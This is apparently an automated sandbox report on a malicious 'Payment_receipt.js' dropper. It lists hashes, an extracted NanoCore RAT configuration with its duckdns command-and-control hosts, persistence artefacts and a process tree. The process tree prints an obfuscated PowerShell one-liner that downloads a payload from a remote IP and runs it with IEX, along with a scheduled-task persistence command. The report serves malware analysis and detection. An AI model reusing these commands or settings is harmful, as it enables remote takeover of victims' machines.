Analysis
-
max time kernel
161s -
max time network
165s -
platform
windows10_x64 -
resource
win10-en-20211014 -
submitted
28-10-2021 15:41
Static task
static1
Behavioral task
behavioral1
Sample
h6d2_Payment_receipt.js
Resource
win7-en-20210920
General
-
Target
h6d2_Payment_receipt.js
-
Size
81KB
-
MD5
ac46bea5b7fd09b1ab3da2b95cb03006
-
SHA1
e59702bca30c23aed49b4e24e6f1411c450ba8d2
-
SHA256
2b3792055f5035ac6e37c372853654eb1d2ec05425f217b339816b0aa12605a2
-
SHA512
601600fd54e840843d04ea97f5e04389933cff2c49e0bca97207a27fe95937f282a8c3fc35f2e684aeb0f073f049dcd9f74ecf25fd56c9c35109d82d7ca433e4
Malware Config
Extracted
http://13.78.209.105/E/err.txt
Extracted
nanocore
1.2.2.0
kenimaf.duckdns.org:8090
543e7469-d950-4ec2-a110-de54f8d16167
-
activate_away_mode
true
-
backup_connection_host
kenimaf.duckdns.org
-
backup_dns_server
8.8.4.4
-
buffer_size
65535
-
build_time
2021-08-01T06:39:50.225932136Z
-
bypass_user_account_control
true
- bypass_user_account_control_data
-
clear_access_control
true
-
clear_zone_identifier
false
-
connect_delay
4000
-
connection_port
8090
-
default_group
kenn
-
enable_debug_mode
true
-
gc_threshold
1.048576e+07
-
keep_alive_timeout
30000
-
keyboard_logging
false
-
lan_timeout
2500
-
max_packet_size
1.048576e+07
-
mutex
543e7469-d950-4ec2-a110-de54f8d16167
-
mutex_timeout
5000
-
prevent_system_sleep
false
-
primary_connection_host
kenimaf.duckdns.org
-
primary_dns_server
8.8.8.8
-
request_elevation
true
-
restart_delay
5000
-
run_delay
0
-
run_on_startup
true
-
set_critical_process
true
-
timeout_interval
5000
-
use_custom_dns_server
false
-
version
1.2.2.0
-
wan_timeout
8000
Extracted
vjw0rm
http://6200js.duckdns.org:6200
Signatures
-
Blocklisted process makes network request 3 IoCs
Processes:
wscript.exepowershell.exeflow pid process 9 1956 wscript.exe 26 3164 powershell.exe 27 3164 powershell.exe -
Drops startup file 2 IoCs
Processes:
wscript.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\h6d2_Payment_receipt.js wscript.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\h6d2_Payment_receipt.js wscript.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
wscript.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run wscript.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run\BB4HJP0E1C = "'C:\\Users\\Admin\\AppData\\Local\\Temp\\h6d2_Payment_receipt.js'" wscript.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 3164 set thread context of 2860 3164 powershell.exe aspnet_compiler.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies registry class 1 IoCs
Processes:
wscript.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings wscript.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.exeaspnet_compiler.exepid process 3164 powershell.exe 3164 powershell.exe 3164 powershell.exe 2860 aspnet_compiler.exe 2860 aspnet_compiler.exe 2860 aspnet_compiler.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
aspnet_compiler.exepid process 2860 aspnet_compiler.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exeaspnet_compiler.exedescription pid process Token: SeDebugPrivilege 3164 powershell.exe Token: SeDebugPrivilege 2860 aspnet_compiler.exe -
Suspicious use of WriteProcessMemory 14 IoCs
Processes:
wscript.exeWScript.exepowershell.exedescription pid process target process PID 1956 wrote to memory of 920 1956 wscript.exe schtasks.exe PID 1956 wrote to memory of 920 1956 wscript.exe schtasks.exe PID 1956 wrote to memory of 1188 1956 wscript.exe WScript.exe PID 1956 wrote to memory of 1188 1956 wscript.exe WScript.exe PID 1188 wrote to memory of 3164 1188 WScript.exe powershell.exe PID 1188 wrote to memory of 3164 1188 WScript.exe powershell.exe PID 3164 wrote to memory of 2860 3164 powershell.exe aspnet_compiler.exe PID 3164 wrote to memory of 2860 3164 powershell.exe aspnet_compiler.exe PID 3164 wrote to memory of 2860 3164 powershell.exe aspnet_compiler.exe PID 3164 wrote to memory of 2860 3164 powershell.exe aspnet_compiler.exe PID 3164 wrote to memory of 2860 3164 powershell.exe aspnet_compiler.exe PID 3164 wrote to memory of 2860 3164 powershell.exe aspnet_compiler.exe PID 3164 wrote to memory of 2860 3164 powershell.exe aspnet_compiler.exe PID 3164 wrote to memory of 2860 3164 powershell.exe aspnet_compiler.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\h6d2_Payment_receipt.js1⤵
- Blocklisted process makes network request
- Drops startup file
- Adds Run key to start application
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /sc minute /mo 30 /tn Skype /tr 'C:\Users\Admin\AppData\Local\Temp\h6d2_Payment_receipt.js2⤵
- Creates scheduled task(s)
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\OWZC107LZZ.vbs"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $H ='http://13.78.209.105/E/err.txt';$H1 = '******************^^^^^^^^^^^^^^^^^^``````````````'.Replace('******************','n').Replace('^^^^^^^^^^^^^^^^^^','E').Replace('``````````````','t');$H2 ='DDDDDDDDEEEEEEEEEEE'.Replace('DDDDDDDD','.').Replace('EEEEEEEEEE','W');$H4 ='NNNNNNNNNNNNNNNNTTTTTTTTTTNT'.Replace('NNNNNNNNNNNNNNNNTTTTTTTTTT','IE');$H3 ='LLLLLLLLLL'.Replace('LLLLLLLLL','bC');$HH =$H1+$H2+$H3+$H4;$HHH ='DO---------------nG'.Replace('---------------','WnLoaDSTrI');$HHHH ='I`---------------Ec++++++++++++++H).$HHH($H)'.Replace('`---------------','EX(ne`W`-Obj`').Replace('++++++++++++++','`T $H');&('I'+'EX')($HHHH -Join '')|&('I'+'EX');3⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\OWZC107LZZ.vbsMD5
2b137d3d2ea7ddba63e99586f44e0388
SHA1d4634061943a78624880537ffa65472fc6195474
SHA2561af97b7b7febcf25481d8c653b141681be8a1cad29a563e9057c02c1c87b75c2
SHA5126a7240273576e625066b114960fa4063acd9404727d02bcd3183248f5c820161ec15fafe01858d22ddcf39cd4d03f8e52988625aabd7b01565339b8927693115
-
memory/920-115-0x0000000000000000-mapping.dmp
-
memory/1188-116-0x0000000000000000-mapping.dmp
-
memory/2860-177-0x0000000005BC0000-0x0000000005BC3000-memory.dmpFilesize
12KB
-
memory/2860-176-0x0000000005A90000-0x0000000005AA9000-memory.dmpFilesize
100KB
-
memory/2860-175-0x0000000005140000-0x0000000005145000-memory.dmpFilesize
20KB
-
memory/2860-174-0x0000000002840000-0x0000000002841000-memory.dmpFilesize
4KB
-
memory/2860-172-0x0000000004DF0000-0x0000000004DF1000-memory.dmpFilesize
4KB
-
memory/2860-171-0x0000000004EF0000-0x0000000004EF1000-memory.dmpFilesize
4KB
-
memory/2860-164-0x0000000000400000-0x0000000000438000-memory.dmpFilesize
224KB
-
memory/2860-170-0x0000000004E50000-0x0000000004E51000-memory.dmpFilesize
4KB
-
memory/2860-169-0x0000000005350000-0x0000000005351000-memory.dmpFilesize
4KB
-
memory/2860-167-0x0000000000810000-0x0000000000848000-memory.dmpFilesize
224KB
-
memory/2860-165-0x000000000041E792-mapping.dmp
-
memory/3164-124-0x00000262C9FE0000-0x00000262C9FE1000-memory.dmpFilesize
4KB
-
memory/3164-166-0x00000262B0010000-0x00000262B0012000-memory.dmpFilesize
8KB
-
memory/3164-131-0x00000262CA0C3000-0x00000262CA0C5000-memory.dmpFilesize
8KB
-
memory/3164-132-0x00000262B0010000-0x00000262B0012000-memory.dmpFilesize
8KB
-
memory/3164-146-0x00000262CA0C6000-0x00000262CA0C8000-memory.dmpFilesize
8KB
-
memory/3164-147-0x00000262CA0C8000-0x00000262CA0C9000-memory.dmpFilesize
4KB
-
memory/3164-158-0x00000262B0010000-0x00000262B0012000-memory.dmpFilesize
8KB
-
memory/3164-159-0x00000262CA040000-0x00000262CA064000-memory.dmpFilesize
144KB
-
memory/3164-160-0x00000262B0010000-0x00000262B0012000-memory.dmpFilesize
8KB
-
memory/3164-129-0x00000262CC1A0000-0x00000262CC1A1000-memory.dmpFilesize
4KB
-
memory/3164-128-0x00000262B0010000-0x00000262B0012000-memory.dmpFilesize
8KB
-
memory/3164-130-0x00000262CA0C0000-0x00000262CA0C2000-memory.dmpFilesize
8KB
-
memory/3164-127-0x00000262B0010000-0x00000262B0012000-memory.dmpFilesize
8KB
-
memory/3164-126-0x00000262B0010000-0x00000262B0012000-memory.dmpFilesize
8KB
-
memory/3164-125-0x00000262B0010000-0x00000262B0012000-memory.dmpFilesize
8KB
-
memory/3164-123-0x00000262B0010000-0x00000262B0012000-memory.dmpFilesize
8KB
-
memory/3164-122-0x00000262B0010000-0x00000262B0012000-memory.dmpFilesize
8KB
-
memory/3164-173-0x00000262CA070000-0x00000262CA071000-memory.dmpFilesize
4KB
-
memory/3164-121-0x00000262B0010000-0x00000262B0012000-memory.dmpFilesize
8KB
-
memory/3164-120-0x00000262B0010000-0x00000262B0012000-memory.dmpFilesize
8KB
-
memory/3164-119-0x00000262B0010000-0x00000262B0012000-memory.dmpFilesize
8KB
-
memory/3164-118-0x0000000000000000-mapping.dmp